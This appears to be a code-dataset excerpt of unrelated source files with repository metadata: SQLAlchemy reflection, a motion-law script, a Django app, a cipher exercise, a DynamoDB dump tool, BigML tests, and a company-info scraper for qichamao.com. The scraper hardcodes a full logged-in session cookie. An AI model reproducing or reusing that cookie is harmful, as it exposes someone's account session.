Given a string `table_name`, and an optional string `schema`, return
foreign key information as a list of dicts with these keys:
constrained_columns
a list of column names that make up the foreign key
referred_schema
the name of the referred schema
referred_table
the name of the referred table
referred_columns
a list of column names in the referred table that correspond to
constrained_columns
name
optional name of the foreign key constraint.
\**kw
other options passed to the dialect's get_foreign_keys() method.
"""
fk_defs = self.dialect.get_foreign_keys(self.bind, table_name, schema,
info_cache=self.info_cache,
**kw)
return fk_defs
def get_indexes(self, table_name, schema=None, **kw):
"""Return information about indexes in `table_name`.
Given a string `table_name` and an optional string `schema`, return
index information as a list of dicts with these keys:
name
the index's name
column_names
list of column names in order
unique
boolean
\**kw
other options passed to the dialect's get_indexes() method.
"""
indexes = self.dialect.get_indexes(self.bind, table_name,
schema,
info_cache=self.info_cache, **kw)
return indexes
def reflecttable(self, table, include_columns, exclude_columns=()):
"""Given a Table object, load its internal constructs based on introspection.
This is the underlying method used by most dialects to produce
table reflection. Direct usage is like::
from sqlalchemy import create_engine, MetaData, Table
from sqlalchemy.engine import reflection
engine = create_engine('...')
meta = MetaData()
user_table = Table('user', meta)
insp = Inspector.from_engine(engine)
insp.reflecttable(user_table, None)
:param table: a :class:`~sqlalchemy.schema.Table` instance.
:param include_columns: a list of string column names to include
in the reflection process. If ``None``, all columns are reflected.
"""
dialect = self.bind.dialect
# table attributes we might need.
reflection_options = dict(
(k, table.kwargs.get(k)) for k in dialect.reflection_options if k in table.kwargs)
schema = table.schema
table_name = table.name
# apply table options
tbl_opts = self.get_table_options(table_name, schema, **table.kwargs)
if tbl_opts:
table.kwargs.update(tbl_opts)
# table.kwargs will need to be passed to each reflection method. Make
# sure keywords are strings.
tblkw = table.kwargs.copy()
for (k, v) in tblkw.items():
del tblkw[k]
tblkw[str(k)] = v
# Py2K
if isinstance(schema, str):
schema = schema.decode(dialect.encoding)
if isinstance(table_name, str):
table_name = table_name.decode(dialect.encoding)
# end Py2K
# columns
found_table = False
for col_d in self.get_columns(table_name, schema, **tblkw):
found_table = True
table.dispatch.column_reflect(table, col_d)
name = col_d['name']
if include_columns and name not in include_columns:
continue
if exclude_columns and name in exclude_columns:
continue
coltype = col_d['type']
col_kw = {
'nullable':col_d['nullable'],
}
for k in ('autoincrement', 'quote', 'info', 'key'):
if k in col_d:
col_kw[k] = col_d[k]
colargs = []
if col_d.get('default') is not None:
# the "default" value is assumed to be a literal SQL expression,
# so is wrapped in text() so that no quoting occurs on re-issuance.
colargs.append(
sa_schema.DefaultClause(
sql.text(col_d['default']), _reflected=True
)
)
if 'sequence' in col_d:
# TODO: mssql, maxdb and sybase are using this.
seq = col_d['sequence']
sequence = sa_schema.Sequence(seq['name'], 1, 1)
if 'start' in seq:
sequence.start = seq['start']
if 'increment' in seq:
sequence.increment = seq['increment']
colargs.append(sequence)
col = sa_schema.Column(name, coltype, *colargs, **col_kw)
table.append_column(col)
if not found_table:
raise exc.NoSuchTableError(table.name)
# Primary keys
pk_cons = self.get_pk_constraint(table_name, schema, **tblkw)
if pk_cons:
pk_cols = [table.c[pk]
for pk in pk_cons['constrained_columns']
if pk in table.c and pk not in exclude_columns
] + [pk for pk in table.primary_key if pk.key in exclude_columns]
primary_key_constraint = sa_schema.PrimaryKeyConstraint(name=pk_cons.get('name'),
*pk_cols
)
table.append_constraint(primary_key_constraint)
# Foreign keys
fkeys = self.get_foreign_keys(table_name, schema, **tblkw)
for fkey_d in fkeys:
conname = fkey_d['name']
constrained_columns = fkey_d['constrained_columns']
referred_schema = fkey_d['referred_schema']
referred_table = fkey_d['referred_table']
referred_columns = fkey_d['referred_columns']
refspec = []
if referred_schema is not None:
sa_schema.Table(referred_table, table.metadata,
autoload=True, schema=referred_schema,
autoload_with=self.bind,
**reflection_options
)
for column in referred_columns:
refspec.append(".".join(
[referred_schema, referred_table, column]))
else:
sa_schema.Table(referred_table, table.metadata, autoload=True,
autoload_with=self.bind,
**reflection_options
)
for column in referred_columns:
refspec.append(".".join([referred_table, column]))
table.append_constraint(
sa_schema.ForeignKeyConstraint(constrained_columns, refspec,
conname, link_to_name=True))
# Indexes
indexes = self.get_indexes(table_name, schema)
for index_d in indexes:
name = index_d['name']
columns = index_d['column_names']
unique = index_d['unique']
flavor = index_d.get('type', 'unknown type')
if include_columns and \
not set(columns).issubset(include_columns):
util.warn(
"Omitting %s KEY for (%s), key covers omitted columns." %
(flavor, ', '.join(columns)))
continue
sa_schema.Index(name, *[table.columns[c] for c in columns],
**dict(unique=unique))
| [
"[email protected]"
] | |
5ea6dac2e1e68ac62b2b84dc089bade38e2b1911 | 4e135c9d35a033c8f9f5c70e57ae27f61b4f34fb | /19_Sympact/Python/sympact.py | cc5b733f58860962724032b8ef0ef8b107763984 | [] | no_license | xpessoles/TP_Documents_PSI | a95b57eebd32a3641a02623e01cd3ab32f3155c2 | 76bd77fed5a88337e7669c8ca01944020de47458 | refs/heads/master | 2023-08-23T21:15:23.205881 | 2023-08-15T06:15:29 | 2023-08-15T06:15:29 | 168,961,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,417 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 21 07:27:14 2022
@author: xpess
"""
import numpy as np
import matplotlib.pyplot as plt
def trapeze(les_t: list, t1: float, t2: float, amax: float, vmax: float) -> tuple:
    """
    Trapezoidal motion law: position / velocity / acceleration over time.
    Parameters
    ----------
    les_t : list
        Sampled time instants.
    t1 : float
        Acceleration time (end of the ramp-up).
    t2 : float
        Acceleration time + constant-velocity time (start of the ramp-down).
    amax : float
        Maximum acceleration.
    vmax : float
        Maximum velocity (the plateau speed actually used is amax*t1).
    Returns
    -------
    tuple
        Arrays of positions, velocities and accelerations.
    """
les_pos = []
les_vit = []
les_acc = []
x1,v1 = 0,0
x2,v2 = 0,0
for t in les_t :
if t<t1 :
les_pos.append(0.5*amax*t*t)
les_vit.append(amax*t)
les_acc.append(amax)
x1,v1,t11 = les_pos[-1], les_vit[-1],t
elif t>=t1 and t<t2 :
les_pos.append(v1*(t-t11)+x1)
les_vit.append(v1)
les_acc.append(0)
x2,v2,t22 = les_pos[-1], les_vit[-1],t
elif t>=t2 and t<=t1+t2 :
les_pos.append(-0.5*amax*(t-t22)**2+v2*(t-t22)+x2)
les_vit.append(v2-amax*(t-t22))
les_acc.append(-amax)
else :
les_pos.append(les_pos[-1])
les_vit.append(0)
les_acc.append(0)
return np.array(les_pos),np.array(les_vit),np.array(les_acc)
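# Hedged example of the profile above: with t1=0.5 s, t2=2.0 s and
# amax=2 rad/s^2 the plateau velocity is amax*t1 = 1 rad/s (note that the
# vmax argument is never used inside trapeze; the plateau speed is implied
# by amax and t1):
#
#   t_demo = np.linspace(0, 2.5, 1000)
#   pos, vit, acc = trapeze(t_demo, 0.5, 2.0, 2.0, 1.0)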
def plot_pva(les_t,les_pos,les_vit,les_acc):
plt.plot(les_t,les_pos)
plt.plot(les_t,les_vit)
plt.plot(les_t,les_acc)
plt.grid()
plt.show()
def loi_ES(les_theta, R, H):
    # Input/output law of the mechanism: cam angle theta -> output angle phi.
    les_phi = np.arctan2(H + R*np.sin(les_theta), R*np.cos(les_theta))
    return les_phi
def deriv(les_t, les_x):
    # Forward finite difference; the last value is duplicated so the result
    # keeps the same length as the input.
    les_v = []
    for i in range(len(les_t)-1):
        les_v.append((les_x[i+1]-les_x[i])/(les_t[i+1]-les_t[i]))
    les_v.append(les_v[-1])
    return np.array(les_v)
J1 = 188939e-9 # kgm2
J2 = 2233294973e-9 # kgm2
t1 = .1645 #
t2 = t1+0.671
theta_0 = -np.radians(30.61)
vmax = 4.93 # rad/s
amax = 30 # rad/s²
R, H = 0.081, 0.112  # geometry parameters -- adjust if needed
les_t = np.linspace(0, t1+t2+t1, 12000)  # the extra +t1 gives samples after the motion ends
les_pos,les_vit,les_acc = trapeze(les_t, t1, t2, amax, vmax)
# Calcul des positions
les_theta = les_pos + theta_0
les_phi = loi_ES(les_theta,R,H)
plt.plot(les_t,np.degrees(les_theta))
plt.plot(les_t,np.degrees(les_phi))
# Calcul des vitesses
les_thetap = deriv(les_t,les_theta)
les_phip = deriv(les_t,les_phi)
plt.figure()
plt.plot(les_t,les_thetap)
plt.plot(les_t,les_phip)
# Calcul des accélerations
les_thetapp = deriv(les_t,les_thetap)
les_phipp = deriv(les_t,les_phip)
plt.figure()
plt.plot(les_t,les_thetapp)
plt.plot(les_t,les_phipp)
# les_theta = les_pos
# les_phi = loi_ES(les_theta,R,H)
# les_thetap = deriv(les_t,les_theta)
# les_phip = deriv(les_t,les_phi)
# les_thetapp = deriv(les_t[:-1],les_thetap)
# les_phipp = deriv(les_t[:-1],les_phi)
# plt.plot(les_theta,label='Input')
# plt.plot(les_phi,label='Output')
# plt.legend()
Mu,M,g = 0.5,5,9.81
alpha =np.radians(45)
deb,fin = 1,1000
Cm = (J2*les_thetap*les_thetapp+J1*les_phip*les_phipp+Mu*M*g*np.cos(les_phi-alpha)*les_thetap)/les_thetap
plt.plot(les_t,Mu*M*g*np.cos(les_phi-alpha))
#Cm = (J2*les_thetap[deb:fin]*les_thetapp[deb:fin]+J1*les_phip[deb:fin]*les_phipp[deb:fin])/les_thetap[deb:fin]
plt.figure()
plt.plot(les_t,Cm)
# # INPUT : THETA
# # OUTPUT : PHI | [
"[email protected]"
] | |
b34cc4a6c6bb510a6cb526348b14851f8cf7b341 | 27c9b374a75550252ddfe5da400fad891c6de590 | /chars/monster_scripts/MonsterAudio.py | d92db631a6f408a33e87967e694889278c5eabfa | [] | no_license | Dynamique-Zak/Zelda_BlenderGame | 03065416939deb3ce18007909ccc278c736baad0 | 0f5d5d15bfa79e9f8ea15f0ebcb76bce92f77a21 | refs/heads/master | 2016-08-13T00:12:34.746520 | 2016-02-19T23:18:27 | 2016-02-19T23:18:27 | 49,572,402 | 30 | 16 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | import aud
# load sound device
device = aud.device()
class MonsterAudio:
def __init__(self):
self.lastStepFrame = 0
def playStepSound(self, current_frame, frames, audio):
for frame in frames:
			# trigger window: [frame, frame + 1]
if ( (current_frame >= frame and current_frame <= frame+1) and self.lastStepFrame != frame):
self.lastStepFrame = frame
device.play(audio)
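# Hedged usage sketch (Blender Game Engine assumed; the sound factory call
# below follows the old 'aud' API and the frame numbers are illustrative):
#
#   step_sound = aud.Factory('//sounds/step.wav')
#   monster_audio = MonsterAudio()
#   # each logic tick, with the armature's current action frame:
#   monster_audio.playStepSound(current_frame, [12, 36], step_sound)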
| [
"[email protected]"
] | |
b4114f55a3b44215c32b9f099140ad31264d5e11 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/simple-cipher/85118e8764e3424d97f4175fe0cad1fd.py | 28007cdd0fefc6a8857a63ff19f4b2b3418fd3e8 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 1,923 | py | # cgi path
# William Morris
# exercism.io
# cipher.py
import random
class Caesar:
def __init__(self):
self.key = 'd'
def encode(self,phrase):
encoded_phrase = ''
for letter in phrase:
if letter.isalpha():
encoded_phrase += _shift(letter.lower(),self.key,1)
return encoded_phrase
def decode(self,phrase):
decoded_phrase = ''
for letter in phrase:
if letter.isalpha():
decoded_phrase += _shift(letter.lower(),self.key,-1)
return decoded_phrase
class Cipher:
def __init__(self, key = None):
if key:
self.key = key
else:
self.key = ''.join([chr(random.randint(97,122)) for i in range(100)])
def encode(self,phrase):
keylist = list(self.key)
phrase = list(phrase)
while len(keylist) < len(phrase):
keylist += keylist
encoded_phrase = ''
for letter,key in zip(phrase,keylist):
if letter.isalpha():
encoded_phrase +=_shift(letter,key,1)
return encoded_phrase
def decode(self,phrase):
keylist = list(self.key)
while len(keylist) < len(phrase):
keylist += keylist
decoded_phrase = ''
for letter,key in zip(phrase,keylist):
if letter.isalpha():
decoded_phrase +=_shift(letter,key,-1)
return decoded_phrase
def _shift(letter,key,sign):
'''letter and key must be lower case, sign must be 1 (for encode)
or -1 (for decode)'''
shift = ord(key)-97
letter_ascii = ord(letter)
letter_ascii += sign*shift
while letter_ascii < 97 or letter_ascii > 122:
letter_ascii -= sign*26
return chr(letter_ascii)
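if __name__ == '__main__':
    # Minimal round-trip check (a sketch, separate from the exercism tests).
    caesar = Caesar()
    assert caesar.encode('hello') == 'khoor'   # key 'd' shifts by 3
    cipher = Cipher('abc')
    assert cipher.decode(cipher.encode('hello')) == 'hello'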
| [
"[email protected]"
] | |
2d6be584dbe664f1c96da1731febcec3c8fc88fb | 2481cde6506743565dff2b405a2396daf208ab3e | /src/notification/migrations/0026_notificationmessage_sender.py | 567ce2e804646575b24a3ee33b7668cbd7a59bdb | [
"Apache-2.0"
] | permissive | aropan/clist | 4819a3036d179595e4df8c646aff2ed593b9dad3 | 5c805b2af71acee97f993f19d8d4e229f7f5b411 | refs/heads/master | 2023-08-31T11:15:17.987776 | 2023-08-27T21:51:14 | 2023-08-27T21:52:16 | 187,111,853 | 276 | 35 | Apache-2.0 | 2023-09-06T18:42:53 | 2019-05-16T22:57:03 | Python | UTF-8 | Python | false | false | 593 | py | # Generated by Django 3.1.14 on 2022-01-17 00:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('true_coders', '0048_auto_20220111_2315'),
('notification', '0025_auto_20220111_2315'),
]
operations = [
migrations.AddField(
model_name='notificationmessage',
name='sender',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='sender_set', to='true_coders.coder'),
),
]
| [
"[email protected]"
] | |
b8aafb5b60e806817d8bb6084aae738c01bfca0b | 22b1ca0d3e93c10356a95aa4377a798e3615bcc3 | /djoauth/djoauth/urls.py | 7566acb7c068796cad8ba9fafab4d105db12ece4 | [] | no_license | xtornasol512/djoauth | b99142640356d454a738a5047a315449d3a5315a | dede596ecc0fee3010f331b01975b5cb51c122dd | refs/heads/master | 2020-04-09T14:43:15.017259 | 2018-12-04T20:37:31 | 2018-12-04T20:37:31 | 160,405,246 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 956 | py | """djoauth URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from home.views import simple_view, terms
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^accounts/', include('allauth.urls')),
url(r'^$', simple_view, name="simple_view"),
url(r'^terms$', terms, name="terms"),
]
| [
"[email protected]"
] | |
3afd9866a37000da97a5bae4e35cf4934ba1a2ad | 0a973640f0b02d7f3cf9211fcce33221c3a50c88 | /.history/src/qichamao_cmpInfo_20210203092107.py | f91c112ba48f192dce00f481f0f2d683966be121 | [] | no_license | JiajunChen123/IPO_under_review_crawler | 5468b9079950fdd11c5e3ce45af2c75ccb30323c | 031aac915ebe350ec816c05a29b5827fde588567 | refs/heads/main | 2023-02-26T08:23:09.622725 | 2021-02-04T10:11:16 | 2021-02-04T10:11:16 | 332,619,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,230 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : qichamao_cmpInfo.py
@Time : 2021/02/03 09:17:24
@Author : Jiajun Chen
@Version : 1.0
@Contact : [email protected]
@License : (C)Copyright 2017-2018, Liugroup-NLPR-CASIA
'''
import requests
from bs4 import BeautifulSoup
import time
import csv
import pandas as pd
import numpy as np
# login = {'user':'13710149700',
# 'password':'123456'}
# The website scraped here is qichamao.com
base_url = 'https://www.qichamao.com'
# requests.post('https://www.qichamao.com',data=login,headers=afterLogin_headers)
# Log in to a Qichamao account in the browser first, then paste the session cookie below
afterLogin_headers = {'Cookie':'qznewsite.uid=y4eseo3a1q4xbrwimor3o5tm; qz.newsite=6C61702DD95709F9EE190BD7CCB7B62C97136BAC307B6F0B818EC0A943307DAB61627F0AC6CD818268C10D121B37F840C1EF255513480EC3012A7707443FE523DD7FF79A7F3058E5E7FB5CF3FE3544235D5313C4816B54C0CDB254F24D8ED5235B722BCBB23BE62B19A2370E7F0951CD92A731FE66C208D1BE78AA64758629806772055F7210C67D442DE7ABBE138EF387E6258291F8FBF85DFF6C785E362E2903705A0963369284E8652A61531293304D67EBB8D28775FBC7D7EBF16AC3CCA96F5A5D17; Hm_lvt_55ad112b0079dd9ab00429af7113d5e3=1611805092,1612262918; Hm_lpvt_55ad112b0079dd9ab00429af7113d5e3=1612262927',
'Referer':'https://www.qichamao.com/',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
def get_compInfo(comp):
    # Given a company name, return the company's basic registration info
r = requests.get('{}/search/all/{}'.format(base_url,comp),headers=afterLogin_headers)
r.raise_for_status()
    r.encoding = 'utf-8'  # force utf-8 decoding (needed on linux)
soup = BeautifulSoup(r.text,features="html.parser")
url = base_url + soup.find(attrs={'class':'listsec_con'}).a['href']
# soup.find(attrs={'class':'listsec_con'})
time.sleep(5)
rs = requests.get(url,headers=afterLogin_headers)
rs.encoding='utf-8'
soup2 = BeautifulSoup(rs.text,'html.parser')
info = soup2.find(attrs={'class':'qd-table-body li-half f14'}).findAll('div')
info = [i.get_text().strip() for i in info]
compinfo = {'法定代表人':info[0],
'纳税人识别号':info[1],
'名称':info[2],
'机构代码':info[3],
'注册号':info[4],
'注册资本':info[5],
'统一社会信用代码':info[6],
'登记机关':info[7],
'经营状态':info[8],
'成立日期':info[9],
'企业类型':info[10],
'经营期限':info[11],
'所属地区':info[12],
'核准时间':info[13],
'企业地址':info[14],
'经营范围':info[15]}
return compinfo
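# Hedged usage sketch (the company name below is a placeholder):
#
#   info = get_compInfo('某某科技有限公司')
#   print(info['统一社会信用代码'], info['经营范围'])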
if __name__ == '__main__':
import pickle
with open('./saved_config/zb_zxb_stocksInfo.pkl', 'rb') as file:
all_data = pickle.load(file)
j =0
for i, (k, v) in enumerate(all_data.items()):
if v['统一社会信用代码'] == '':
try:
compinfo = get_compInfo(v['机构名称'])
                print('Fetched:', compinfo['名称'])
v['统一社会信用代码'] = compinfo['统一社会信用代码']
v['经营范围'] = compinfo['经营范围']
except:
print("需要验证码更新")
wait = input("Press Enter to continue.")
compinfo = get_compInfo(v['机构名称'])
v['统一社会信用代码'] = compinfo['统一社会信用代码']
v['经营范围'] = compinfo['经营范围']
else:
j+=1
time.sleep(3)
else:
continue
if j > 60:
break
with open('./saved_config/zb_zxb_stocksInfo.pkl', 'wb') as file:
pickle.dump(all_data,file, pickle.HIGHEST_PROTOCOL)
# your stuff
# df = pd.read_excel('C:/Users/chen/Desktop/IPO_info/P020210122657813200711.xls',skipfooter=1,skiprows=2,index_col='序号',keep_default_na=False,encoding='utf-8',sheet_name=0)
# comp1 = df[' 企业名称'].values
# df2 = pd.read_excel('C:/Users/chen/Desktop/IPO_info/P020210122657813200711.xls',skipfooter=1,skiprows=2,index_col='序号',keep_default_na=False,encoding='utf-8',sheet_name=1)
# comp2 = df2[' 企业名称'].values
# compList =np.append(comp1,comp2)
# # for i in compList:
# # compinfo = get_compInfo(i)
# # csv_columns = ['法定代表人','纳税人识别号','名称','机构代码','注册号','注册资本','统一社会信用代码','登记机关',\
# # '经营状态','成立日期','企业类型','经营期限','所属地区','核准时间','企业地址','经营范围']
# # csv_file = "credit.csv"
# # try:
# # with open(csv_file, 'a+') as csvfile:
# # writer = csv.DictWriter(csvfile, fieldnames=csv_columns)
# # writer.writeheader()
# # writer.writerow(compinfo)
# # except IOError:
# # print("I/O error")
# try:
# with open('C:/Users/chen/Desktop/IPO_info/csrc_dict.pkl', 'rb') as file:
# csrc_dict = pickle.load(file)
# except:
# csrc_dict = {}
# count = 0
# for i in compList:
# count +=1
# i = i.replace(r'*','')
# if i in data:
# if i in csrc_dict and i['统一社会信用代码'] != '':
# continue
# try:
# compinfo = get_compInfo(i)
# data[i]['统一社会信用代码'] = compinfo['统一社会信用代码']
# data[i]['经营范围'] = compinfo['经营范围']
# csrc_dict.update(data[i])
# except:
# print('cannot use anymore')
# else:
# print('cannot found value: ',i)
# if count % 20 == 0:
# time.sleep(60)
# with open('C:/Users/chen/Desktop/IPO_info/csrc.pkl', 'rb') as file:
# pickle.dump(csrc_dict, file, pickle.HIGHEST_PROTOCOL) | [
"[email protected]"
] | |
b4ccb64fb9f5a2c0c23bf3b386d43e9fbc4568bd | 01a085bb89225d0390316036a915b2b8d7403219 | /bin/dynamodb_dump | 8550b8bc85167f6177c7a589e20cdfa1b46810ab | [] | no_license | vipinsachdeva/elasticluster_full | 0199ee00e716f285173c8974fdf9570ab5d43470 | 71160196682a8d18a9547d5d28e8a885b067924d | refs/heads/master | 2021-05-15T11:35:44.706476 | 2017-10-25T22:37:37 | 2017-10-25T22:37:37 | 108,333,786 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,153 | #!/home/vsachde/elasticluster/bin/python
import argparse
import errno
import os
import boto
from boto.compat import json
from boto.compat import six
DESCRIPTION = """Dump the contents of one or more DynamoDB tables to the local filesystem.
Each table is dumped into two files:
- {table_name}.metadata stores the table's name, schema and provisioned
throughput.
- {table_name}.data stores the table's actual contents.
Both files are created in the current directory. To write them somewhere else,
use the --out-dir parameter (the target directory will be created if needed).
"""
def dump_table(table, out_dir):
metadata_file = os.path.join(out_dir, "%s.metadata" % table.name)
data_file = os.path.join(out_dir, "%s.data" % table.name)
with open(metadata_file, "w") as metadata_fd:
json.dump(
{
"name": table.name,
"schema": table.schema.dict,
"read_units": table.read_units,
"write_units": table.write_units,
},
metadata_fd
)
with open(data_file, "w") as data_fd:
for item in table.scan():
# JSON can't serialize sets -- convert those to lists.
data = {}
for k, v in six.iteritems(item):
if isinstance(v, (set, frozenset)):
data[k] = list(v)
else:
data[k] = v
data_fd.write(json.dumps(data))
data_fd.write("\n")
def dynamodb_dump(tables, out_dir):
try:
os.makedirs(out_dir)
except OSError as e:
# We don't care if the dir already exists.
if e.errno != errno.EEXIST:
raise
conn = boto.connect_dynamodb()
for t in tables:
dump_table(conn.get_table(t), out_dir)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
prog="dynamodb_dump",
description=DESCRIPTION
)
parser.add_argument("--out-dir", default=".")
parser.add_argument("tables", metavar="TABLES", nargs="+")
namespace = parser.parse_args()
dynamodb_dump(namespace.tables, namespace.out_dir)
| [
"vipin@kryptonite"
] | vipin@kryptonite |
|
d3930fcd5569ff795869cbce29d26dee4a4a1439 | e00052a9c36f72e5b50ab0605fbd47f956f3d44f | /bigml/tests/test_40_local_from_file.py | cf221e7ad822415b9ed180a2f8e9fae2615dcfe1 | [
"Apache-2.0",
"LicenseRef-scancode-public-domain"
] | permissive | Bakage1016/python | e0e97541732af1c3a22c29b9e1fe982c46a41521 | d844258dbf43d5ae285fee793765aae95866ca58 | refs/heads/master | 2023-02-05T14:28:07.933696 | 2020-12-22T18:57:32 | 2020-12-22T18:57:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,488 | py | # -*- coding: utf-8 -*-
#
# Copyright 2018-2020 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Creating tests for building local models from files
"""
from .world import world, setup_module, teardown_module
from . import create_model_steps as model_create
from . import create_linear_steps as linear_create
from . import create_source_steps as source_create
from . import create_dataset_steps as dataset_create
from . import create_ensemble_steps as ensemble_create
from . import create_anomaly_steps as anomaly_create
from . import create_time_series_steps as timeseries_create
from . import create_association_steps as association_create
from . import create_cluster_steps as cluster_create
from . import create_lda_steps as topic_create
from . import compare_predictions_steps as prediction_compare
class TestLocalFromFile(object):
def setup(self):
"""
Debug information
"""
print("\n-------------------\nTests in: %s\n" % __name__)
def teardown(self):
"""
Debug information
"""
print("\nEnd of tests in: %s\n-------------------\n" % __name__)
def test_scenario1(self):
"""
Scenario 1: Successfully creating a local model from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a model
And I wait until the model is ready less than <time_3> secs
And I export the "<pmml>" model to "<exported_file>"
When I create a local model from the file "<exported_file>"
Then the model ID and the local model ID match
Examples:
| data | time_1 | time_2 | time_3 | pmml | exported_file
| ../data/iris.csv | 10 | 10 | 10 | False | ./tmp/model.json
"""
print(self.test_scenario1.__doc__)
examples = [
['data/iris.csv', '10', '10', '10', False, './tmp/model.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
model_create.i_create_a_model(self)
model_create.the_model_is_finished_in_less_than(self, example[3])
model_create.i_export_model(self, example[4], example[5])
model_create.i_create_local_model_from_file(self, example[5])
model_create.check_model_id_local_id(self)
def test_scenario2(self):
"""
Scenario 2: Successfully creating a local ensemble from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create an ensemble
And I wait until the ensemble is ready less than <time_3> secs
And I export the ensemble to "<exported_file>"
When I create a local ensemble from the file "<exported_file>"
Then the ensemble ID and the local ensemble ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
| ../data/iris.csv | 10 | 10 | 50 | ./tmp/ensemble.json
"""
print(self.test_scenario2.__doc__)
examples = [
['data/iris.csv', '10', '10', '50', './tmp/ensemble.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
ensemble_create.i_create_an_ensemble(self)
ensemble_create.the_ensemble_is_finished_in_less_than(self, example[3])
ensemble_create.i_export_ensemble(self, example[4])
ensemble_create.i_create_local_ensemble_from_file(self, example[4])
ensemble_create.check_ensemble_id_local_id(self)
def test_scenario3(self):
"""
Scenario 3: Successfully creating a local logistic regression from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a logistic regression
And I wait until the logistic regression is ready less than <time_3> secs
And I export the logistic regression to "<exported_file>"
When I create a local logistic regression from the file "<exported_file>"
Then the logistic regression ID and the local logistic regression ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
| ../data/iris.csv | 10 | 10 | 50 | ./tmp/logistic.json
"""
print(self.test_scenario3.__doc__)
examples = [
['data/iris.csv', '10', '10', '50', './tmp/logistic.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
model_create.i_create_a_logistic_model(self)
model_create.the_logistic_model_is_finished_in_less_than(self, example[3])
model_create.i_export_logistic_regression(self, example[4])
model_create.i_create_local_logistic_regression_from_file(self, example[4])
model_create.check_logistic_regression_id_local_id(self)
def test_scenario4(self):
"""
Scenario 4: Successfully creating a local deepnet from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a deepnet
And I wait until the deepnet is ready less than <time_3> secs
And I export the deepnet to "<exported_file>"
When I create a local deepnet from the file "<exported_file>"
Then the deepnet ID and the local deepnet ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
            | ../data/iris.csv | 10 | 10 | 500 | ./tmp/deepnet.json
"""
print(self.test_scenario4.__doc__)
examples = [
['data/iris.csv', '10', '10', '500', './tmp/deepnet.json']]
for example in examples:
print("\nTesting with:\n", example)
source_create.i_upload_a_file(self, example[0])
source_create.the_source_is_finished(self, example[1])
dataset_create.i_create_a_dataset(self)
dataset_create.the_dataset_is_finished_in_less_than(self, example[2])
model_create.i_create_a_deepnet(self)
model_create.the_deepnet_is_finished_in_less_than(self, example[3])
model_create.i_export_deepnet(self, example[4])
model_create.i_create_local_deepnet_from_file(self, example[4])
model_create.check_deepnet_id_local_id(self)
def test_scenario5(self):
"""
Scenario 5: Successfully creating a local cluster from an exported file:
Given I create a data source uploading a "<data>" file
And I wait until the source is ready less than <time_1> secs
And I create a dataset
And I wait until the dataset is ready less than <time_2> secs
And I create a cluster
And I wait until the cluster is ready less than <time_3> secs
And I export the cluster to "<exported_file>"
When I create a local cluster from the file "<exported_file>"
Then the cluster ID and the local cluster ID match
Examples:
| data | time_1 | time_2 | time_3 | exported_file
            | ../data/iris.csv | 10 | 10 | 500 | ./tmp/cluster.json
"""
print(self.test_scenario5.__doc__)
examples = [
['data/iris.csv', '10', '10', '500', './tmp/cluster.json']]
for example in examples:
